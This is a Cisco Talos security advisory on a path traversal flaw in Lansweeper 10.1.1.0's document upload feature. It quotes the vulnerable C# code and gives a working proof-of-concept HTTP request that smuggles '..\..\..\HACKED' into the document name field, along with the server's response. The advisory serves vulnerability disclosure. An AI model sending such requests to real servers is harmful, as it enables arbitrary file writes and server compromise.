CVE-2022-32573: TALOS-2022-1528 || Cisco Talos Intelligence Group

SUMMARY

A directory traversal vulnerability exists in the AssetActions.aspx addDoc functionality of Lansweeper lansweeper 10.1.1.0. A specially-crafted HTTP request can lead to arbitrary file upload. An attacker can send an HTTP request to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Lansweeper lansweeper 10.1.1.0

PRODUCT URLS

lansweeper - https://www.lansweeper.com/

CVSSv3 SCORE

9.9 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

CWE

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)

DETAILS

Lansweeper is an IT Asset Management solution that gathers hardware and software information of computers and other devices on a computer network for management, compliance and audit purposes.

An exploitable directory traversal vulnerability is related with an action: Assets -> choose any asset -> Docs -> Add document and is located inside the \LS\WS\AssetActions.cs file. Let us take a close look at the vulnerable source code :

Line 1  else if (page.IsPostBack && current.Request["action"] == "addDoc")
Line 2  {
Line 3 
Line 4      if (fileup.PostedFile != null && fileup.PostedFile.ContentLength > 0)
Line 5      {
Line 6          string text5 = Path.GetFileName(fileup.PostedFile.FileName);
Line 7          string text6 = Guid.NewGuid().ToString();
Line 8          int value6 = int.Parse(current.Request["assetId"]);
Line 9          string item = DateTime.Now.ToString(User.Current().DateTimeFormat);
Line 10         WebUser webUser2 = (WebUser)current.Session["Webuser"];
Line 11         string text7 = ((!webUser2.IsAuthenticated) ? webUser2.Displayname : (webUser2.UserDomain + "\\" + webUser2.UserName));
Line 12         string[] allowedExtensions = General.AllowedExtensions;
Line 13         string text8 = Path.GetExtension(fileup.FileName).ToLower();
Line 14         if (txtdocname.Text != "")
Line 15         {
Line 16             text5 = txtdocname.Text + text8;
Line 17         }
Line 18         bool flag = false;
Line 19         string[] array = allowedExtensions;
Line 20         for (int i = 0; i < array.Length; i++)
Line 21         {
Line 22             if (array[i] == text8)
Line 23             {
Line 24                 flag = true;
Line 25             }
Line 26         }
Line 27         string text9 = HttpContext.Current.Server.MapPath("~") + "\\DOCS\\";
Line 28         string filename = text9 + text6 + "_" + text5;
Line 29         if (!Directory.Exists(text9))
Line 30         {
Line 31             Directory.CreateDirectory(text9);
Line 32         }
Line 33         try
Line 34         {
Line 35             if (!flag)
Line 36             {
Line 37                 text4 = text4 + "file extension ('" + text8 + "') is not allowed.";
Line 38                 throw new CustomException(text4);
Line 39             }
Line 40             fileup.PostedFile.SaveAs(filename);

Uploading a file (document), an attacker can use the txtdocname (Display name in web GUI) variable to provide an alternative filename which is not sanitized at all in a context of directory traversal. Next, that name is concatenated in a simple way with a path to DOCS directory lines 27-28. Lack of proper txtdocname sanitization allows an attacker to upload a file to an arbitrary destination within the file system.

Exploit Proof of Concept

REQUEST

POST /AssetActions.aspx?action=addDoc&assetId=10 HTTP/1.1
Host: 192.168.0.102:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------23614898975253108242957970650
Content-Length: 644
Origin: http://192.168.0.102:81
Connection: close
Referer: http://192.168.0.102:81/AssetActions.aspx?action=addDoc&assetId=10
Cookie: UserSettings=language=1; ASP.NET_SessionId=etcnsycpe3rytjmue2efl5co; custauth=username=hacker&userdomain=; __RequestVerificationToken_Lw__=zP2evPOU4gLNF/pF3R1XPsIP7ceImHsHKoqy7GfYwDnIwHnDJKt3r5+0bFTXNS/XpEAiyEFBVT2ekfSLIPgVMULtvi8Ae4qLSYcUO0UH90vcERUKMi72E3I2yEJexWSyNKlA8gcXlfMPYbc0a94Dji44b2cNn4aS0KGOSUQBn/0=
Upgrade-Insecure-Requests: 1

-----------------------------23614898975253108242957970650
Content-Disposition: form-data; name="__VIEWSTATE"


-----------------------------23614898975253108242957970650
Content-Disposition: form-data; name="fileup"; filename="doc_name_ppt.magicext.ini"
Content-Type: application/vnd.ms-powerpoint

ATTACKER CONTROLED CONTENT
-----------------------------23614898975253108242957970650
Content-Disposition: form-data; name="txtdocname"

..\..\..\HACKED
-----------------------------23614898975253108242957970650
Content-Disposition: form-data; name="btnOK"

Upload
-----------------------------23614898975253108242957970650--

RESPONSE

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
x-frame-options: SAMEORIGIN
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 06 Jun 2022 14:53:18 GMT
Connection: close
Content-Length: 159

<script>window.parent.closeIframe(["10","..\\..\\..\\HACKED.ini","6405c669-95ed-4469-bb1a-ae4665868d1a","..\\Unauthenticated","06/06/2022 16:53:18"]);</script>

TIMELINE

2022-06-27 - Vendor Disclosure
2022-11-29 - Vendor Patch Release
2022-12-01 - Public Release

Discovered by Marcin ‘Icewall’ Noga of Cisco Talos.